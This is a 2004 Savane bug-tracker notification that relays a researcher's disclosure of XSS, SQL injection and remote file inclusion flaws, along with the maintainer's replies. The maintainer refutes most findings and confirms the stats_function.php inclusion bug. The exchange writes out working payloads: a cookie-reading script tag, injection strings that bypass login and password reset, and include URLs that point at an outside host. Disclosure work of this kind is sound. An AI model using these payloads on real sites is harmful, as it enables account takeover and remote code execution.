This mail is an automated notification from the bugs tracker
of the project: Savane.
/**************************************************************************/
[bugs #724] Latest Modifications:
Changes by:
Mathieu Roy <[EMAIL PROTECTED]>
'Date:
sam 18.09.2004 � 08:22 (Europe/Paris)
What | Removed | Added
---------------------------------------------------------------------------
Resolution | None | Fixed
Privacy | Private | Public
Status | Open | Closed
Release | 1.0.3 | > 1.0.4
Summary | Multiple vulnerabilities in Savane Product | vulnerability in
frontend/php/include/stats_functions.php
------------------ Additional Follow-up Comments ----------------------------
"This works but only if magic_quotes_gpc is set to Off."
Yes, but PHP shipped with magic_quotes_gpc set to off by all major GNU/Linux
distributors, and for good reason.
If you want to avoid that, before any SQL command, you are force to make a test on
magic_quotes_gpc presence, and use addslashes if missing, because addslashes is dumb
enough to escape escaped characters.
I'd say it's just PHP bad design here. And well, this problem applies to any PHP
software.
"Sorry, I don't want bother."
You don't have to. We are glad that you find out that an old and useless file could be
exploited maliciously. Now, we're one week before 1.0.4 release and majors sites
running Savane have been warned, so I guess there's no a real need for a 1.0.3.1
release.
I'll close this item and post a news item.
Thanks for your contribution.
/**************************************************************************/
[bugs #724] Full Item Snapshot:
URL: <http://gna.org/bugs/?func=detailitem&item_id=724>
Project: Savane
Submitted by: Joxean Koret
On: jeu 16.09.2004 � 23:53
Category: Web Frontend
Severity: 6 - Security
Priority: C - Normal
Resolution: Fixed
Privacy: Public
Assigned to: yeupou
Status: Closed
Release: > 1.0.4
Planned Release:
Summary: vulnerability in frontend/php/include/stats_functions.php
Original Submission:
---------------------------------------------------------------------------
Multiple Vulnerabilities in Savane
---------------------------------------------------------------------------
Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Savane Latest (Released at 24-Aug-2004 08:23)
Savane is a Web-based Libre Software hosting system. It currently includes
issue tracking (bugs, task, support), project and member management, mailing
lists, and individual account maintenance.
Web : https://gna.org/projects/savane
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Cross Site Scripting
A1. I have found a Cross Site Scripting vulnerability in the PHP login form.
To try the vulnerability you can view the following URL :
http(s)://<site-with-savane>/account/login.php?form_loginname="><script>alert(document.cookie)</script>
B. SQL Injection Vulnerabilities
B1. I have found various SQL Injection vulnerabilities. The Savane product is only
affected if :
A) The environment variable SV_LOCAL_INC_PREFIX is defined
and
B) PHP is configured with "magic_quotes_gpc" to "On"
and
C) Register_globas directive is set to on in the file php.ini
The following php scripts are vulnerables :
http://localhost/savane/account/updateprefs.php?form_use_cvsadmin=SQL_INJECTION
http://localhost/savane/account/pending-resend.php?form_use_cvsadmin=SQL_INJECTION
http://localhost/savane/account/lostpw-confirm.php?form_loginname=SQL_Injection
http://localhost/savane/account/logout.php?session_hash=SQLInjection
http://localhost/savane/account/login.php?user_id=SQLINJECTION&session_hash=SQLINJECTION
C. Remote Code Execution
C1. The first remote PHP code execution vulnerability that I found is only
exploitable if magic_quotes_gpc is set to on. To try this :
http://localhost/savane/include/stats_function.php?sys_urlroot=http://fuckingsite.com?
I have found various other vulnerabilities of the same kind, but are only
exploitables if the SV_LOCAL_INC_PREFIX environment variable is defined (always)
and the register_globals is set to on.
Examples:
http://localhost/savane/include/pre.php?sys_urlroot=http://fuckingsite.com?
http://localhost/savane/account/lostlogin.php?sys_urlroot=http://fuckingsite.com?
Disclaimer:
~~~~~~~~~~~
The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
Commentaires
------------------
-------------------------------------------------------
Date: sam 18.09.2004 � 08:22 By: Mathieu Roy <yeupou>
"This works but only if magic_quotes_gpc is set to Off."
Yes, but PHP shipped with magic_quotes_gpc set to off by all major GNU/Linux
distributors, and for good reason.
If you want to avoid that, before any SQL command, you are force to make a test on
magic_quotes_gpc presence, and use addslashes if missing, because addslashes is dumb
enough to escape escaped characters.
I'd say it's just PHP bad design here. And well, this problem applies to any PHP
software.
"Sorry, I don't want bother."
You don't have to. We are glad that you find out that an old and useless file could be
exploited maliciously. Now, we're one week before 1.0.4 release and majors sites
running Savane have been warned, so I guess there's no a real need for a 1.0.3.1
release.
I'll close this item and post a news item.
Thanks for your contribution.
-------------------------------------------------------
Date: sam 18.09.2004 � 01:53 By: Joxean Koret <joseanpiti>
>------------------------------------------------------------------------
>Study of "Multiple vulnerabilities in Savane Product"
>------------------------------------------------------------------------
>
> >A. Cross Site Scripting
> >
> >A1. I have found a Cross Site Scripting vulnerability in the PHP login form.
> > To try the vulnerability you can view the following URL :
>
> >I do not call that vulnerability. To do so, someone need first to be able to forrge
> >an url. If he can forge an url, he does not need a Savane running to print
> >javascript.
May be not a vulnerability, but this is dangerous. Yes, is needed to forge an url,
but I think that may be dangerous
>
> ------------------------------------------------------------------------
>
> > B. SQL Injection Vulnerabilities
> > http://localhost/savane/account/updateprefs.php?form_use_cvsadmin=SQL_INJECTION
>
> I tried, it does not work at all.
> How could it work? In this case, the variable is only used in an if statement.
>
This doesn't work, sorry. I don't know I have done...
> > B. SQL Injection Vulnerabilities
> > http://localhost/savane/account/login.php?user_id=SQLINJECTION&session_hash=SQLINJECTION
>
> I also tried too, it did not work either.
> (php escape ', so you cannot do injection)
>
This works but only if magic_quotes_gpc is set to Off.
> I did not checked the others, I guess it's similar.
>
Take a look to the following :
Only if magic_quotes_gpc is set to Off:
http://localhost/savannah/account/lostlogin.php?confirm_hash='%20or%201=1%20limit%201--
Only in conjunction with the prior bug:
http://localhost/savannah/account/lostlogin.php?confirm_hash='%20or%20user_id=known_user%20limit%201--&form_pw=1&form_pw2=1&Update=1
http://localhost/savannah/account/pending-resend.php?form_user='%20or%202>1
This works, at least, in my system.
>
> ------------------------------------------------------------------------
>
> > C. Remote Code Execution
> > http://localhost/savane/include/stats_function.php?sys_urlroot=http://fuckingsite.com?
>
> This is confirmed. Workaround: remove the file. It's not used in the code at all
> > C. Remote Code Execution
> >
>
> This cannot work. $sys_urlroot is set by the configuration file, so if you
> fill it it will be overriden in any cases by
> require getenv('SV_LOCAL_INC_PREFIX').'/savannah.conf.php';
>
> > C. Remote Code Execution
> >
>
> This cannot work. pre.php is called before
> require $GLOBALS['sys_urlroot']."/include/account.php";
> which means $GLOBALS['sys_urlroot'] will be set accordingly to the configuration
> file.
>
You're right, only works the problem in stats_function.php.
Again, sorry because I don't know what I have been confused.
> ----------------------------------------------
>
> I'd like an exhaustive list of other Remote Code Execution vulnerabilities you think
> you found.
>
I tried and doesn't work.
> I have made grep "require " on the whole frontend code and no require using a global
> to set the path exists without previous require of "pre.php", setting appropriately
> pathes.
>
> I'm also a bit surprised that you always recall that "the SV_LOCAL_INC_PREFIX
> environment variable" must be defined, since with the version of Savane you tried,
> the PHP frontend would not run if it's not set.
>
My system was bad configured.
> I wait for the list of other files affected according to you. At the end of the day,
> I release Savane 1.0.3.2 (removal of the useless and insecure stats_function.php)
Sorry, I don't want bother.
-------------------------------------------------------
Date: ven 17.09.2004 � 09:25 By: Mathieu Roy <yeupou>
Study of "Multiple vulnerabilities in Savane Product"
------------------------------------------------------------------------
>A. Cross Site Scripting
>
>A1. I have found a Cross Site Scripting vulnerability in the PHP login form.
> To try the vulnerability you can view the following URL :
I do not call that vulnerability. To do so, someone need first to be able to forrge an
url. If he can forge an url, he does not need a Savane running to print javascript.
------------------------------------------------------------------------
> B. SQL Injection Vulnerabilities
> http://localhost/savane/account/updateprefs.php?form_use_cvsadmin=SQL_INJECTION
I tried, it does not work at all.
How could it work? In this case, the variable is only used in an if statement.
> B. SQL Injection Vulnerabilities
> http://localhost/savane/account/login.php?user_id=SQLINJECTION&session_hash=SQLINJECTION
I also tried too, it did not work either.
(php escape ', so you cannot do injection)
I did not checked the others, I guess it's similar.
------------------------------------------------------------------------
> C. Remote Code Execution
> http://localhost/savane/include/stats_function.php?sys_urlroot=http://fuckingsite.com?
This is confirmed. Workaround: remove the file. It's not used in the code at all
> C. Remote Code Execution
>http://localhost/savane/include/pre.php?sys_urlroot=http://fuckingsite.com
This cannot work. $sys_urlroot is set by the configuration file, so if you
fill it it will be overriden in any cases by
require getenv('SV_LOCAL_INC_PREFIX').'/savannah.conf.php';
> C. Remote Code Execution
>http://localhost/savane/account/lostlogin.php?sys_urlroot=http://fuckingsite.com
This cannot work. pre.php is called before
require $GLOBALS['sys_urlroot']."/include/account.php";
which means $GLOBALS['sys_urlroot'] will be set accordingly to the configuration file.
----------------------------------------------
I'd like an exhaustive list of other Remote Code Execution vulnerabilities you think
you found.
I have made grep "require " on the whole frontend code and no require using a global
to set the path exists without previous require of "pre.php", setting appropriately
pathes.
I'm also a bit surprised that you always recall that "the SV_LOCAL_INC_PREFIX
environment variable" must be defined, since with the version of Savane you tried, the
PHP frontend would not run if it's not set.
I wait for the list of other files affected according to you. At the end of the day, I
release Savane 1.0.3.2 (removal of the useless and insecure stats_function.php)
CC List
-------
CC Address | Comment
------------------------------------+-----------------------------
ype |
beuc --�-- gnu --POINT-- org | I think that you need to be advised.
For detailed info, follow this link:
<http://gna.org/bugs/?func=detailitem&item_id=724>
_______________________________________________
Message post� via/par Gna!
http://gna.org/
_______________________________________________
Savane-dev mailing list
[EMAIL PROTECTED]
https://mail.gna.org/listinfo/savane-dev
